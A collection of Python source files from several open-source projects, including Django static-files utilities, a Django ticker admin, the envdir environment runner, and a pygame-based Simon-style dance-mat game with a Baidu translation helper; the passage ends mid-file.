def override_setting(name: str, value: Any) -> Callable[[F], F]:
def decorator(fn: F) -> F:
@functools.wraps(fn)
def wrapper(*args, **kwargs):
original = getattr(settings, name)
setattr(settings, name, value)
try:
return fn(*args, **kwargs)
finally:
setattr(settings, name, original)
return cast(F, wrapper)
return decorator
def override_storage_attr(name: str, value: Any) -> Callable[[F], F]:
def decorator(fn: F) -> F:
@functools.wraps(fn)
def wrapper(*args, **kwargs):
storage = import_string(django_settings.STATICFILES_STORAGE)
original = getattr(storage, name)
setattr(storage, name, value)
try:
return fn(*args, **kwargs)
finally:
setattr(storage, name, original)
return cast(F, wrapper)
return decorator
```
|
{
"source": "jezdez/django-staticfiles",
"score": 3
}
|
#### File: django-staticfiles/staticfiles/utils.py
```python
import os
import fnmatch
import warnings
def get_files_for_app(app, ignore_patterns=None):
"""
Return a list containing the relative source paths for all files that
should be copied for an app.
"""
from staticfiles.storage import AppStaticStorage
if ignore_patterns is None:
ignore_patterns = []
warnings.warn(
"The staticfiles.utils.get_files_for_app utility function is "
"deprecated. Use staticfiles.storage.AppStaticStorage.get_files "
"instead.", DeprecationWarning)
return AppStaticStorage(app).get_files(ignore_patterns)
def get_app_prefix(app):
"""
Return the path name that should be prepended to files for this app.
"""
from staticfiles.storage import AppStaticStorage
warnings.warn(
"The staticfiles.utils.get_app_prefix utility function is "
"deprecated. Use staticfiles.storage.AppStaticStorage.get_prefix "
"instead.", DeprecationWarning)
return AppStaticStorage(app).get_prefix()
def matches_patterns(path, patterns=None):
"""
Return True or False depending on whether the ``path`` should be
ignored (if it matches any pattern in ``ignore_patterns``).
"""
if patterns is None:
patterns = []
for pattern in patterns:
if fnmatch.fnmatchcase(path, pattern):
return True
return False
def get_filtered_patterns(storage, ignore_patterns=None, location=''):
"""
Return a filtered list of patterns that match the storage location.
"""
if ignore_patterns is None:
ignore_patterns = []
storage_prefix = getattr(storage, 'prefix', None) or ''
if location:
rel_location = os.path.join(storage_prefix, location)
abs_location = os.path.join(storage.location, location)
else:
rel_location = storage_prefix
abs_location = storage.location
ignore_filtered = []
for pattern in ignore_patterns:
head, tail = os.path.split(pattern)
if not tail:
head, tail = os.path.split(head)
if head in ('', rel_location, abs_location):
ignore_filtered.append(tail)
return ignore_filtered
def get_files(storage, ignore_patterns=None, location=''):
"""
Recursively walk the storage directories yielding the paths
of all files that should be copied.
"""
if ignore_patterns is None:
ignore_patterns = []
ignore_filtered = get_filtered_patterns(storage, ignore_patterns, location)
directories, files = storage.listdir(location)
for fn in files:
if matches_patterns(fn, ignore_filtered):
continue
if location:
fn = os.path.join(location, fn)
yield fn
for dir in directories:
if matches_patterns(dir, ignore_filtered):
continue
if location:
dir = os.path.join(location, dir)
for fn in get_files(storage, ignore_patterns, dir):
yield fn
```
|
{
"source": "jezdez/django-ticker",
"score": 2
}
|
#### File: django-ticker/ticker/admin.py
```python
from django import forms
from django.db import models
from django.contrib import admin
from django.contrib.auth.models import User
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext as _
from tagging.models import Tag
from ticker.models import Entry, EntryResource, EntryResourceType
from ticker.widgets import ForeignKeyAsTextWidget
class EntryMetadataInline(admin.StackedInline):
model = EntryResource
fieldsets = (
(None, {
'fields': (('type', 'title'), 'description', 'url')
}),
)
class EntryAdmin(admin.ModelAdmin):
inlines = [EntryMetadataInline]
list_display = (
'title',
'status',
'author',
)
fields = (
'author',
'status',
'title',
'content',
'content_more',
'tags',
'enable_comments',
)
def queryset(self, request):
"""
Shows only entries which author is the current user.
Show all entries if the user has the permission `can_change_foreign`.
"""
if request.user.has_perm('ticker.can_change_foreign'):
return self.model._default_manager.get_query_set()
return self.model._default_manager.get_query_set().filter(author=request.user)
def formfield_for_dbfield(self, db_field, **kwargs):
field = super(EntryAdmin, self).formfield_for_dbfield(db_field, **kwargs)
# authors of who are not allow to edit foreign articles won't see a
# dropdown
if db_field.name == "author":
if not self._request.user.has_perm('ticker.can_change_foreign'):
field.widget = ForeignKeyAsTextWidget(append_text=_('Your username gets saved automatically'))
field.initial = self._request.user.pk
return field
if db_field.name == "status":
# if the author has "can_publish" permissions he shall be given
# "closed" and "draft" choices
if not self._request.user.has_perm('ticker.can_publish'):
user_choices = ([i for i in Entry.STATUS_CHOICES \
if i[0] != Entry.STATUS_OPEN])
else:
user_choices = Entry.STATUS_CHOICES
# except the article was set to be "live", then show it
if hasattr(self, '_obj') and self._obj.status == Entry.STATUS_OPEN:
user_choices = Entry.STATUS_CHOICES
field = forms.ChoiceField(choices=user_choices)
return field
return field
# ``formfield_for_dbfield`` has no access to the request, therefore we
# put the request here into the global class.
def change_view(self, request, object_id, *args, **kwargs):
self._request = request
self._obj = Entry.objects.get(pk=object_id)
return super(EntryAdmin, self).change_view(request, object_id, *args, **kwargs)
def add_view(self, request, *args, **kwargs):
self._request = request
return super(EntryAdmin, self).add_view(request, *args, **kwargs)
def has_change_permission(self, request, obj=None):
if not super(EntryAdmin, self).has_change_permission(request, obj):
return False
if obj is not None and not request.user.has_perm('ticker.can_change_foreign') \
and request.user.pk != obj.author.pk:
return False
return True
admin.site.register(Entry, EntryAdmin)
admin.site.register(EntryResourceType)
```
|
{
"source": "jezdez/envdir",
"score": 2
}
|
#### File: envdir/envdir/runner.py
```python
import optparse
import os
import subprocess
import sys
from .env import Env
from .version import __version__
class Response(Exception):
def __init__(self, message="", status=0):
self.message = message
self.status = status
class Runner(object):
envdir_usage = "usage: %prog [--help] [--version] dir child"
envshell_usage = "usage: %prog [--help] [--version] dir"
def __init__(self):
self.parser = optparse.OptionParser(version=__version__)
self.parser.disable_interspersed_args()
self.parser.prog = "envdir"
def path(self, path):
real_path = os.path.realpath(os.path.expanduser(path))
if not os.path.exists(real_path):
# use 111 error code to adher to envdir's standard
raise Response("envdir %r does not exist" % path, 111)
if not os.path.isdir(real_path):
# use 111 error code to adher to envdir's standard
raise Response("envdir %r not a directory" % path, 111)
return real_path
def open(self, path=None, stacklevel=1):
if path is None:
frame = sys._getframe()
def get_parent(frame):
return frame.f_back
for _ in range(stacklevel):
frame = get_parent(frame)
if frame is not None:
callerdir = os.path.dirname(frame.f_code.co_filename)
path = os.path.join(callerdir, "envdir")
else:
# last holdout, assume cwd
path = "envdir"
return Env(self.path(path))
def shell(self, name, *args):
self.parser.set_usage(self.envshell_usage)
self.parser.prog = "envshell"
options, args = self.parser.parse_args(list(args))
if len(args) == 0:
raise Response(
"%s\nError: incorrect number of arguments\n"
% (self.parser.get_usage()),
2,
)
sys.stdout.write(
"Launching envshell for %s. "
"Type 'exit' or 'Ctrl+D' to return.\n" % self.path(args[0])
)
sys.stdout.flush()
self.open(args[0], 2)
if "SHELL" in os.environ:
shell = os.environ["SHELL"]
elif "COMSPEC" in os.environ:
shell = os.environ["COMSPEC"]
else:
raise Response("Unable to detect current environment shell")
try:
subprocess.call([shell])
except OSError as err:
if err.errno == 2:
raise Response("Unable to find shell %s" % shell, status=err.errno)
else:
raise Response("An error occurred: %s" % err, status=err.errno)
raise Response()
def run(self, name, *args):
self.parser.set_usage(self.envdir_usage)
self.parser.prog = "envdir"
options, args = self.parser.parse_args(list(args))
if len(args) < 2:
raise Response(
"%s\nError: incorrect number of arguments\n"
% (self.parser.get_usage()),
2,
)
self.open(args[0], 2)
# the args to call later
args = args[1:]
# in case someone passes in -- for any reason to separate the commands
if args[0] == "--":
args = args[1:]
try:
os.execvpe(args[0], args, os.environ)
except OSError as err:
raise Response(
"Unable to run command %s: %s" % (args[0], err), status=err.errno
)
raise Response()
def go(caller, *args):
if not args:
args = sys.argv
try:
caller(args[0], *args[1:])
except Response as response:
if response.message:
sys.stderr.write(response.message)
sys.exit(response.status or 0)
else:
sys.exit(0)
runner = Runner()
```
|
{
"source": "jezdez/simonblinks",
"score": 3
}
|
#### File: simonblinks/simonblinks/gameEngine.py
```python
import pygame, math
pygame.init()
class BasicSprite(pygame.sprite.Sprite):
""" use this sprite when you want to
directly control the sprite with dx and dy
or want to extend in another direction than DirSprite
"""
def __init__(self, scene):
pygame.sprite.Sprite.__init__(self)
self.screen = scene.screen
self.image = pygame.Surface((25, 25))
self.image.fill((255, 0, 0))
self.rect = self.image.get_rect()
self.x = 100
self.y = 100
self.dx = 0
self.dy = 0
def update(self):
self.x += self.dx
self.y += self.dy
self.checkBounds()
self.rect.center = (self.x, self.y)
def checkBounds(self):
scrWidth = self.screen.get_width()
scrHeight = self.screen.get_height()
if self.x > scrWidth:
self.x = 0
if self.x < 0:
self.x = scrWidth
if self.y > scrHeight:
self.y = 0
if self.y < 0:
self.y = scrHeight
class SuperSprite(pygame.sprite.Sprite):
""" An enhanced Sprite class
expects a gameEngine.Scene class as its one parameter
Use methods to change image, direction, speed
Will automatically travel in direction and speed indicated
Automatically rotates to point in indicated direction
Five kinds of boundary collision
"""
def __init__(self, scene):
pygame.sprite.Sprite.__init__(self)
self.scene = scene
self.screen = scene.screen
#create constants
self.WRAP = 0
self.BOUNCE = 1
self.STOP = 2
self.HIDE = 3
self.CONTINUE = 4
#create a default text image as a placeholder
#This will usually be changed by a setImage call
self.font = pygame.font.Font("freesansbold.ttf", 30)
self.imageMaster = self.font.render("TUIO", True, (0, 0,0), (0xFF, 0xFF, 0xFF))
self.image = self.imageMaster
self.rect = self.image.get_rect()
#create properties
#most will be changed through method calls
self.x = 200
self.y = 200
self.dx = 0
self.dy = 0
self.dir = 0
self.rotation = 0
self.speed = 0
self.maxSpeed = 10
self.minSpeed = -3
self.boundAction = self.WRAP
self.pressed = False
self.oldCenter = (100, 100)
def update(self):
self.oldCenter = self.rect.center
self.checkEvents()
self.__rotate()
self.__calcVector()
self.__calcPosition()
self.checkBounds()
self.rect.center = (self.x, self.y)
def checkEvents(self):
""" overwrite this method to add your own event code """
pass
def __rotate(self):
""" PRIVATE METHOD
change visual orientation based on
rotation property.
automatically called in update.
change rotation property directly or with
rotateBy(), setAngle() methods
"""
oldCenter = self.rect.center
self.oldCenter = oldCenter
self.image = pygame.transform.rotate(self.imageMaster, self.rotation)
self.rect = self.image.get_rect()
self.rect.center = oldCenter
def __calcVector(self):
""" calculates dx and dy based on speed, dir
automatically called in update
"""
theta = self.dir / 180.0 * math.pi
self.dx = math.cos(theta) * self.speed
self.dy = math.sin(theta) * self.speed
self.dy *= -1
def __calcPosition(self):
""" calculates the sprites position adding
dx and dy to x and y.
automatically called in update
"""
self.x += self.dx
self.y += self.dy
def checkBounds(self):
""" checks boundary and acts based on
self.BoundAction.
WRAP: wrap around screen (default)
BOUNCE: bounce off screen
STOP: stop at edge of screen
HIDE: move off stage and wait
CONTINUE: keep going at present course and speed
automatically called by update
"""
scrWidth = self.screen.get_width()
scrHeight = self.screen.get_height()
#create variables to simplify checking
offRight = offLeft = offTop = offBottom = offScreen = False
if self.x > scrWidth:
offRight = True
if self.x < 0:
offLeft = True
if self.y > scrHeight:
offBottom = True
if self.y < 0:
offTop = True
if offRight or offLeft or offTop or offBottom:
offScreen = True
if self.boundAction == self.WRAP:
if offRight:
self.x = 0
if offLeft:
self.x = scrWidth
if offBottom:
self.y = 0
if offTop:
self.y = scrHeight
elif self.boundAction == self.BOUNCE:
if offLeft or offRight:
self.dx *= -1
if offTop or offBottom:
self.dy *= -1
self.updateVector()
self.rotation = self.dir
elif self.boundAction == self.STOP:
if offScreen:
self.speed = 0
elif self.boundAction == self.HIDE:
if offScreen:
self.speed = 0
self.setPosition((-1000, -1000))
elif self.boundAction == self.CONTINUE:
pass
else:
# assume it's continue - keep going forever
pass
def setSpeed(self, speed):
""" immediately sets the objects speed to the
given value.
"""
self.speed = speed
def speedUp(self, amount):
""" changes speed by the given amount
Use a negative value to slow down
"""
self.speed += amount
if self.speed < self.minSpeed:
self.speed = self.minSpeed
if self.speed > self.maxSpeed:
self.speed = self.maxSpeed
def setAngle(self, dir):
""" sets both the direction of motion
and visual rotation to the given angle
If you want to set one or the other,
set them directly. Angle measured in degrees
"""
self.dir = dir
self.rotation = dir
def turnBy (self, amt):
""" turn by given number of degrees. Changes
both motion and visual rotation. Positive is
counter-clockwise, negative is clockwise
"""
self.dir += amt
if self.dir > 360:
self.dir = amt
if self.dir < 0:
self.dir = 360 - amt
self.rotation = self.dir
def rotateBy(self, amt):
""" change visual orientation by given
number of degrees. Does not change direction
of travel.
"""
self.rotation += amt
if self.rotation > 360:
self.rotation = amt
if self.rotation < 0:
self.rotation = 360 - amt
def setImage (self, image):
""" loads the given file name as the master image
default setting should be facing east. Image
will be rotated automatically """
self.imageMaster = pygame.image.load(image)
self.imageMaster = self.imageMaster.convert()
def setDX(self, dx):
""" changes dx value and updates vector """
self.dx = dx
self.updateVector()
def addDX(self, amt):
""" adds amt to dx, updates vector """
self.dx += amt
self.updateVector()
def setDY(self, dy):
""" changes dy value and updates vector """
self.dy = dy
self.updateVector()
def addDY(self, amt):
""" adds amt to dy and updates vector """
self.dy += amt
self.updateVector()
def setComponents(self, components):
""" expects (dx, dy) for components
change speed and angle according to dx, dy values """
(self.dx, self.dy) = components
self.updateVector()
def setBoundAction (self, action):
""" sets action for boundary. Values are
self.WRAP (wrap around edge - default)
self.BOUNCE (bounce off screen changing direction)
self.STOP (stop at edge of screen)
self.HIDE (move off-stage and stop)
self.CONTINUE (move on forever)
Any other value allows the sprite to move on forever
"""
self.boundAction = action
def setPosition (self, position):
""" place the sprite directly at the given position
expects an (x, y) tuple
"""
(self.x, self.y) = position
def moveBy (self, vector):
""" move the sprite by the (dx, dy) values in vector
automatically calls checkBounds. Doesn't change
speed or angle settings.
"""
(dx, dy) = vector
self.x += dx
self.y += dy
self.__checkBounds()
def forward(self, amt):
""" move amt pixels in the current direction
of travel
"""
#calculate dx dy based on current direction
radians = self.dir * math.pi / 180
dx = amt * math.cos(radians)
dy = amt * math.sin(radians) * -1
self.x += dx
self.y += dy
def addForce(self, amt, angle):
""" apply amt of thrust in angle.
change speed and dir accordingly
add a force straight down to simulate gravity
in rotation direction to simulate spacecraft thrust
in dir direction to accelerate forward
at an angle for retro-rockets, etc.
"""
#calculate dx dy based on angle
radians = angle * math.pi / 180
dx = amt * math.cos(radians)
dy = amt * math.sin(radians) * -1
self.dx += dx
self.dy += dy
self.updateVector()
def updateVector(self):
#calculate new speed and angle based on dx, dy
#call this any time you change dx or dy
self.speed = math.sqrt((self.dx * self.dx) + (self.dy * self.dy))
dy = self.dy * -1
dx = self.dx
radians = math.atan2(dy, dx)
self.dir = radians / math.pi * 180
def setSpeedLimits(self, max, min):
""" determines maximum and minimum
speeds you will allow through
speedUp() method. You can still
directly set any speed you want
with setSpeed() Default values:
max: 10
min: -3
"""
self.maxSpeed = max
self.minSpeed = min
def dataTrace(self):
""" utility method for debugging
print major properties
extend to add your own properties
"""
print "x: %d, y: %d, speed: %.2f, dir: %.f, dx: %.2f, dy: %.2f" % \
(self.x, self.y, self.speed, self.dir, self.dx, self.dy)
def mouseDown(self):
""" boolean function. Returns True if the mouse is
clicked over the sprite, False otherwise
"""
self.pressed = False
if pygame.mouse.get_pressed() == (1, 0, 0):
if self.rect.collidepoint(pygame.mouse.get_pos()):
self.pressed = True
return self.pressed
def clicked(self):
""" Boolean function. Returns True only if mouse
is pressed and released over sprite
"""
released = False
if self.pressed:
if pygame.mouse.get_pressed() == (0, 0, 0):
if self.rect.collidepoint(pygame.mouse.get_pos()):
released = True
return released
def collidesWith(self, target):
""" boolean function. Returns True if the sprite
is currently colliding with the target sprite,
False otherwise
"""
collision = False
if self.rect.colliderect(target.rect):
collision = True
return collision
def collidesGroup(self, target):
""" wrapper for pygame.sprite.collideany
simplifies checking sprite - group collisions
returns result of collision check (sprite from group
that was hit or None)
"""
collision = pygame.sprite.spritecollideany(self, target)
return collision
def distanceTo(self, point):
""" returns distance to any point in pixels
can be used in circular collision detection
"""
(pointx, pointy) = point
dx = self.x - pointx
dy = self.y - pointy
dist = math.sqrt((dx * dx) + (dy * dy))
return dist
def dirTo(self, point):
""" returns direction (in degrees) to
a point """
(pointx, pointy) = point
dx = self.x - pointx
dy = self.y - pointy
dy *= -1
radians = math.atan2(dy, dx)
dir = radians * 180 / math.pi
dir += 180
return dir
def drawTrace(self, color=(0x00, 0x00, 0x00)):
""" traces a line between previous position
and current position of object
"""
pygame.draw.line(self.scene.background, color, self.oldCenter,
self.rect.center, 3)
self.screen.blit(self.scene.background, (0, 0))
class Scene(object):
""" encapsulates the IDEA / ALTER framework
properties:
sprites - a list of sprite objects
that forms the primary sprite group
background - the background surface
screen - the display screen
it's generally best to add all sprites
as attributes, so they can have access
to each other if needed
"""
def __init__(self):
""" initialize the game engine
set up a sample sprite for testing
"""
pygame.init()
self.screen = pygame.display.set_mode((640, 480))
self.background = pygame.Surface(self.screen.get_size())
self.background.fill((0, 0, 0))
# self.sampleSprite = SuperSprite(self)
# self.sampleSprite.setSpeed(3)
# self.sampleSprite.setAngle(0)
# self.sampleSprite.boundAction = self.sampleSprite.WRAP
self.sprites = []
self.groups = []
def start(self):
""" sets up the sprite groups
begins the main loop
"""
self.mainSprites = pygame.sprite.OrderedUpdates(self.sprites)
self.groups.append(self.mainSprites)
self.screen.blit(self.background, (0, 0))
self.clock = pygame.time.Clock()
self.keepGoing = True
while self.keepGoing:
self.__mainLoop()
def stop(self):
"""stops the loop"""
self.keepGoing = False
def __mainLoop(self):
""" manage all the main events
automatically called by start
"""
self.clock.tick(30)
for event in pygame.event.get():
if event.type == pygame.QUIT:
self.keepGoing = False
self.doEvents(event)
self.update()
for group in self.groups:
group.clear(self.screen, self.background)
group.update()
group.draw(self.screen)
pygame.display.flip()
def makeSpriteGroup(self, sprites):
""" create a group called groupName
containing all the sprites in the sprites
list. This group will be added after the
sprites group, and will automatically
clear, update, and draw
"""
tempGroup = pygame.sprite.RenderUpdates(sprites)
return tempGroup
def addGroup(self, group):
""" adds a sprite group to the groups list for
automatic processing
"""
self.groups.append(group)
def doEvents(self, event):
""" overwrite this method to add your own events.
works like normal event handling, passes event
object
"""
pass
def update(self):
""" happens once per frame, after event parsing.
Overwrite to add your own code, esp event handling
that doesn't require event obj. (pygame.key.get_pressed,
pygame.mouse.get_pos, etc)
Also a great place for collision detection
"""
pass
def setCaption(self, title):
""" set's the scene's title text """
pygame.display.set_caption(title)
class Label(pygame.sprite.Sprite):
""" a basic label
properties:
font: font to use
text: text to display
fgColor: foreground color
bgColor: background color
center: position of label's center
size: (width, height) of label
"""
def __init__(self, fontName = "freesansbold.ttf"):
pygame.sprite.Sprite.__init__(self)
self.font = pygame.font.Font(fontName, 20)
self.text = ""
self.fgColor = ((0x00, 0x00, 0x00))
self.bgColor = ((0xFF, 0xFF, 0xFF))
self.center = (100, 100)
self.size = (150, 30)
def update(self):
self.image = pygame.Surface(self.size)
self.image.fill(self.bgColor)
fontSurface = self.font.render(self.text, True, self.fgColor, self.bgColor)
#center the text
xPos = (self.image.get_width() - fontSurface.get_width())/2
self.image.blit(fontSurface, (xPos, 0))
self.rect = self.image.get_rect()
self.rect.center = self.center
class Button(Label):
""" a button based on the label
same properties as label +
active: True if user is clicking on sprite
False if user is not currently clicking
clicked: True when user releases mouse over a
currently active button
"""
def __init__(self):
Label.__init__(self)
self.active = False
self.clicked = False
self.bgColor = (0xCC, 0xCC, 0xCC)
def update(self):
Label.update(self)
self.clicked = False
#check for mouse input
if pygame.mouse.get_pressed() == (1, 0, 0):
if self.rect.collidepoint(pygame.mouse.get_pos()):
self.active = True
#check for mouse release
if self.active == True:
if pygame.mouse.get_pressed() == (0, 0, 0):
self.active = False
if self.rect.collidepoint(pygame.mouse.get_pos()):
self.clicked = True
class Scroller(Button):
""" like a button, but has a numeric value that
can be decremented by clicking on left half
and incremented by clicking on right half.
new atributes:
value: the scroller's numeric value
minValue: minimum value
maxValue: maximum value
increment: How much is added or subtracted
format: format of string interpolation
"""
def __init__(self):
Button.__init__(self)
self.minValue = 0
self.maxValue = 10
self.increment = 1
self.value = 5
self.format = "<< %.2f >>"
def update(self):
Button.update(self)
if self.active:
(mousex, mousey) = pygame.mouse.get_pos()
if mousex < self.rect.centerx:
self.value -= self.increment
if self.value < self.minValue:
self.value = self.minValue
else:
self.value += self.increment
if self.value > self.maxValue:
self.value = self.maxValue
self.text = self.format % self.value
class MultiLabel(pygame.sprite.Sprite):
""" accepts a list of strings, creates a multi-line
label to display text
same properties as label except textLines
is a list of strings. There is no text
property.
Set the size manually. Vertical size should be at
least 30 pixels per line (with the default font)
"""
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.textLines = ["This", "is", "sample", "text"]
self.font = pygame.font.Font("freesansbold.ttf", 20)
self.fgColor = ((0x00, 0x00, 0x00))
self.bgColor = ((0xFF, 0xFF, 0xFF))
self.center = (100, 100)
self.size = (150, 100)
def update(self):
self.image = pygame.Surface(self.size)
self.image.fill(self.bgColor)
numLines = len(self.textLines)
vSize = self.image.get_height() / numLines
for lineNum in range(numLines):
currentLine = self.textLines[lineNum]
fontSurface = self.font.render(currentLine, True, self.fgColor, self.bgColor)
#center the text
xPos = (self.image.get_width() - fontSurface.get_width())/2
yPos = lineNum * vSize
self.image.blit(fontSurface, (xPos, yPos))
self.rect = self.image.get_rect()
self.rect.center = self.center
if __name__ == "__main__":
# change this code to test various features of the engine
# This code will not run when gameEngine is run as a module
# (as it usually will be
game = Scene()
thing = SuperSprite(game)
l = Label()
l.text = "huhu"
thing.setSpeed(5)
thing.setBoundAction(thing.BOUNCE)
thing.setAngle(230)
game.sprites = [thing, l]
game.start()
```
#### File: simonblinks/simonblinks/simonblinks.py
```python
import os, sys
import ConfigParser
from random import randint
import pygame, serial
import pygame.display
import pygame.joystick
from pygame.locals import *
import gameEngine
PLAYSEQUENCE = pygame.USEREVENT+1
# which button to press to start the whole game
STARTBUTTON = K_RETURN
# change assignment of dance mat numbers here (e.g. if played the other way round)
UP, LEFT, DOWN, RIGHT = 1, 2, 3, 4
# assign the keys that handle game play, lookup in the Pygame doc for joystick buttons
# default: keyboard keys for player 1: i,j,k,l player 2 w,a,s,d
PLAYER1_KEYS = {
K_i: UP,
K_j: LEFT,
K_k: DOWN,
K_l: RIGHT
}
PLAYER2_KEYS = {
K_w: UP,
K_a: LEFT,
K_s: DOWN,
K_d: RIGHT
}
# defines the strings that represent the possible light rows
EMPTY, LEFTY, CENTER, RIGHTY = "000", "100", "010", "001"
# assembles the light sequences
LIGHTS = [
[CENTER, EMPTY, EMPTY], # UP
[EMPTY, LEFTY, EMPTY], # LEFT
[EMPTY, EMPTY, CENTER], # DOWN
[EMPTY, RIGHTY, EMPTY], # RIGHT
]
class Joystick(object):
"""
A generic Joystick class which opens and closes on initialization and
quit.
"""
def __init__(self):
pygame.joystick.init()
pygame.joystick.get_init()
self.count = pygame.joystick.get_count()
if self.count > 0:
self.joystick = pygame.joystick.Joystick(0)
self.joystick.init()
print '%d joystick(s) connected: %s' % (self.count, joystick.get_name())
self.num_axes = joystick.get_numaxes()
self.num_buttons = joystick.get_numbuttons()
self.num_hats = joystick.get_numhats()
print 'Joystick has %d axes, %d buttons and %d hats.' % (num_axes, num_buttons, num_hats)
pygame.event.pump()
self.old_axis = []
for num in range(self.num_axes):
self.old_axis.append(0.0)
def both_axis_active(self):
activated_axis = []
for num in range(self.num_axes):
axis = "%.4f" % self.joystick.get_axis(num)
if self.axis != self.old_axis[num]:
activated_axis.append(num)
self.old_axis[num] = self.axis
if len(activated_axis) == range(self.num_axes):
return True
return False
def close(self):
pygame.joystick.quit()
class Player(object):
"""
An abstract player object, which can make a guess about a light sequence,
has three lives and looses the game if dead.
"""
def __init__(self, name, keys):
self.name = name
self.lives = 3
self.dead = False
self.guess = []
self.keys = keys
def die(self):
"""
Substract 1 from the live count until dead.
"""
self.lives -= 1
if self.lives <= 0:
self.dead = True
print "Player lost live: %s (%s more live(s))" % (self.name, self.lives)
def add_guess(self, guess, level):
"""
Adds a guess to the players portfolio, returning true if he is not
dead and not totally dumb
"""
if guess >= 1 and guess <= 4 and len(self.guess) < level and not self.dead:
print "Player %s guess: %s" % (self.name, guess)
self.guess.append(guess)
return True
else:
return False
class Sequence(object):
"""
An abstract senso light sequence to be guessed/danced by the players.
"""
def __init__(self, players):
self.sequence = []
self.level = 3
self.players = players
self.generate()
def clear_guesses(self):
""" Clear all guesses by the players """
for player in self.players:
player.guess = []
def generate(self, restart=False):
""" (Re-)generate the gaming sequence """
if restart:
self.level = 3
self.sequence = []
self.clear_guesses()
for i in xrange(self.level):
self.sequence.append(randint(1, 4))
print "New sequence:", self.sequence
def next_level(self):
""" Jump to the next level of fun! """
self.clear_guesses()
self.sequence.append(randint(1, 4))
self.level += 1
print "New sequence:", self.sequence
def completed_by_players(self):
""" Returns true if all players have finished their sequence """
finished_players = 0
for player in self.players:
if len(player.guess) == len(self.sequence):
finished_players += 1
return finished_players == len(self.players)
def get_sequence(self):
return self.sequence
class Game(gameEngine.Scene):
"""
An abstract game class, inherited from the gameEngine.Scene class,
which basically means that it creates a pygame instance and runs
doEvents() and update() of this class on every loop cycle with a
framerate of 30.
"""
def __init__(self, title, players, config):
gameEngine.Scene.__init__(self)
self.screen = pygame.display.set_mode((320, 240))
self.setCaption(title)
self.players = players
self.config = config
self.joystick = Joystick()
self.serial = None
try:
self.open_serial()
except:
print "Serial connection could not be established! Aborting.."
sys.exit(0)
self.sequence = Sequence(self.players)
self.dead_players = 0
self.ready_for_input = False
self.ready_for_playing = False
print "Press start button to create a new game."
self.start()
def restart(self):
"""
Restarts the current game.
"""
for player in self.players:
player.dead = False
player.lives = 3
self.dead_players = 0
self.sequence.generate(restart=True)
def open_serial(self):
"""
Opens a serial connection.
"""
if self.config.has_option("simonblinks", "serial"):
serial_device = self.config.get("simonblinks", "serial")
self.serial = serial.Serial(serial_device, baudrate=9600,
parity=serial.PARITY_NONE, bytesize=serial.EIGHTBITS,
stopbits=serial.STOPBITS_ONE)
else:
raise SystemError("Please change the 'serial' setting in simonblinks.cfg")
def send_serial(self, lights):
"""
Tries to send a light sequence over the flux compensator to the
logic board connected to the serial port. This is the critical part
when programming the logic boards and may need some treatment on
customization.
"""
print lights
try:
for row in lights:
row_int = int(row, 2)
row_hex = chr(row_int)
self.serial.write(row_hex)
except:
pass
def live_lights(self):
"""
Returns a list with light sequences representing the lives of all
players.
"""
lights = []
for x in range(3):
row = ""
for player in self.players:
if player.dead:
row += "0"
else:
row += "1"
lights.append(row)
lights.reverse()
return lights
def light(self, lights, player):
"""
Assembles the light sequence and prepares it to be sent to the logic
board connected to the serial device.
"""
live_lights = self.live_lights()
light_list = []
x = 0
for light in lights:
if player == 0:
light_list.append(light+live_lights[x]+light)
elif player == 1:
light_list.append(light+live_lights[x]+EMPTY)
elif player == 2:
light_list.append(EMPTY+live_lights[x]+light)
x += 1
self.send_serial(light_list)
def play_sequence(self):
"""
Plays every frame of a sequence. Add delay here if needed.
"""
for frame in self.sequence.get_sequence():
self.light(LIGHTS[frame-1], 0)
def doEvents(self, event):
"""
The mighty all-running loop inherited from gameEnging.Scene. Please
have a look in the docstring of gameEnging.Scene.
"""
if not self.ready_for_playing:
# Just in case we actually see this game in reality
# if event.type == JOYAXISMOTION:
# if self.joystick.both_axis_active():
if event.type == pygame.KEYDOWN:
if event.key == STARTBUTTON:
self.ready_for_playing = True
print "Game started. Now guess!"
print "Player1 keys: W, A, S, D"
print "Player2 keys: I, J, K, L"
pygame.event.post(pygame.event.Event(PLAYSEQUENCE))
if event.type == pygame.KEYDOWN:
key = event.key
if key in (pygame.K_ESCAPE, pygame.K_q):
self.keepGoing = False
if key == K_c:
# manual override a.k.a. jump to next level with key "c"
self.sequence.next_level()
if self.ready_for_input:
for player in self.players:
if key in player.keys:
guess = player.keys[key]
if player.add_guess(guess, self.sequence.level):
self.light(LIGHTS[guess-1], player.name)
if self.sequence.completed_by_players():
for player in self.players:
print "Player %s guessed: %s Sequence is: %s" % (player.name, player.guess, self.sequence.get_sequence())
if player.guess != self.sequence.get_sequence():
player.die()
self.sequence.next_level()
self.ready_for_input = True
self.ready_for_playing = False
pygame.time.delay(500)
elif event.type == JOYBUTTONDOWN:
# dummy things for the joystick
for num in range(num_buttons):
button = joystick.get_button(num)
if button:
print "Button pressed: " + str(num)
elif event.type == PLAYSEQUENCE:
if self.ready_for_playing:
self.play_sequence()
self.ready_for_input = True
def update(self):
"""
Runs after the event loop, on each cycle.
"""
for player in self.players:
if player.dead:
print "Game over player: %s" % player.name
self.dead_players += 1
if self.dead_players == len(self.players):
print "Restarting game.. done."
self.restart()
def quit(self):
"""
Closes conections to joystick and serial ports.
"""
self.joystick.close()
if not game.serial is None:
game.serial.close()
def main():
"""
Main function to start the program
"""
config = ConfigParser.ConfigParser()
config.read(['simonblinks.cfg', os.path.expanduser('~/.simonblinks.cfg')])
players = Player(1, PLAYER1_KEYS), Player(2, PLAYER2_KEYS)
game = Game("<NAME>", players, config)
game.quit()
if __name__=="__main__":
main()
```
|
{
"source": "Jezemy/VideoSubScanPlayer",
"score": 3
}
|
#### File: VideoSubScanPlayer/VideoSubScanPlayer/baidu_translator.py
```python
import requests
import hashlib
import random
import json
from retrying import retry
@retry(stop_max_attempt_number=5)
def Translation(Str):
"""
百度翻译接口调用,需要先注册百度云接口使用
英语转中文
"""
appid = '' # 填写你的appid
secretKey = '' # 填写你的密钥
httpClient = None
myurl = 'http://api.fanyi.baidu.com/api/trans/vip/translate'
fromLang = 'en' # 原文语种
toLang = 'zh' # 译文语种
salt = random.randint(32768, 65536)
q = Str
sign = appid + q + str(salt) + secretKey
sign = hashlib.md5(sign.encode()).hexdigest()
myurl = myurl + '?appid=' + appid + '&q=' + q + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(
salt) + '&sign=' + sign
response = requests.get(myurl)
result = json.loads(response.text)
return result['trans_result'][0]['dst']
if __name__ == '__main__':
